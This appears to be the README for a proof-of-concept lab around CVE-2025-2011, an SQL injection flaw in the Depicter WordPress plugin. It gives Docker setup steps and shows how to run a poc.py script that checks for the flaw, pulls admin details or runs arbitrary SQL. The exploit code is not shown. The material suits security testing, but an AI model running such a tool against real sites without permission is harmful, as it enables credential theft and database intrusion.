# CVE-2025-2011 - Depicter Plugin SQL Injection Vulnerability

**CVE Reference:** [CVE-2025-2011](https://www.tenable.com/cve/CVE-2025-2011)

This repository contains a proof-of-concept environment for testing the SQL injection vulnerability in Depicter Slider & Popup Builder plugin (versions < 3.6.2).

## Prerequisites

- Docker
- Docker Compose
- Python 3.x
- Required Python packages: `requests`, `colorama`

## Setup Instructions

1. **Start the Environment**
   ```bash
   docker-compose up -d
   ```

2. **Complete WordPress Installation**
   - Open your browser and navigate to `http://localhost:5555`
   - Follow the WordPress installation wizard:
     - Select your language
     - Set up your site title
     - Create an admin account
     - Complete the installation

3. **Install the Vulnerable Plugin**
   ```bash
   chmod +x install-plugin.sh
   ./install-plugin.sh
   ```
   This script will:
   - Install WP-CLI in the container
   - Download and install Depicter plugin v3.6.1
   - Activate the plugin

4. **Install Python Dependencies**
   ```bash
   pip install requests colorama
   ```

## Testing the Vulnerability

The PoC script (`poc.py`) can be used to test the vulnerability in different modes:

1. **Check if target is vulnerable**
   ```bash
   python poc.py -u http://localhost:5555
   ```

2. **Extract admin details**
   ```bash
   python poc.py -u http://localhost:5555 -m admin
   ```

3. **Execute custom SQL query**
   ```bash
   python poc.py -u http://localhost:5555 -m custom -q "SELECT VERSION()"
   ```

4. **Enable debug output**
   ```bash
   python poc.py -u http://localhost:5555 -d
   ```

## Environment Details

- WordPress: Latest version
- Depicter Plugin: v3.6.1 (vulnerable version)
- MySQL: 5.7
- PHP: Latest version (from WordPress image)

## Cleanup

To stop and remove the environment:
```bash
docker-compose down -v
```

## Disclaimer

This environment is provided for educational and testing purposes only. Do not use this against any systems without explicit permission.

